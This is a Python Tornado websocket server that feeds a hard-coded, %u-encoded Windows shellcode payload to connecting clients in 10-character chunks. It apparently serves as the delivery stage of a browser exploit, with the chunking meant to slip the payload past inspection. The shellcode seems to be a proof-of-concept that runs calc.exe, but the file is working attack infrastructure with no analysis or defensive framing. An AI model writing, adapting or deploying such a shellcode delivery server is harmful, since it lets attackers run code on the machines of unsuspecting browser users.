import tornado.httpserver
import tornado.websocket
import tornado.ioloop
import tornado.web

PAYLOAD = "%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a%ueb12%u5d86%u016a%u858d%u00b9%u0000%u6850%u8b31%u876f%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72%u006a%uff53%u63d5%u6c61%u2e63%u7865%u0065"
CHUNK_LEN = 10

class WSHandler(tornado.websocket.WebSocketHandler):
	def open(self):
		print("WebSocket opened")

	def on_message(self, message):
		# self.write_message(u"You said: " + message)
		i = 0
		while( i<len(PAYLOAD) ):
			if( i+CHUNK_LEN < len(PAYLOAD) ):
				chunk = PAYLOAD[ i:i+CHUNK_LEN ]
			else:
				chunk = PAYLOAD[ i:len(PAYLOAD) ]
				
			self.write_message( chunk )
			i+=CHUNK_LEN
			print("Sent: " + chunk)
			
		self.close()
		

	def on_close(self):
		print("WebSocket closed")

application = tornado.web.Application([
	(r'/ws', WSHandler),
])
 
if __name__ == "__main__":
	http_server = tornado.httpserver.HTTPServer(application)
	http_server.listen(8888)
	tornado.ioloop.IOLoop.instance().start()
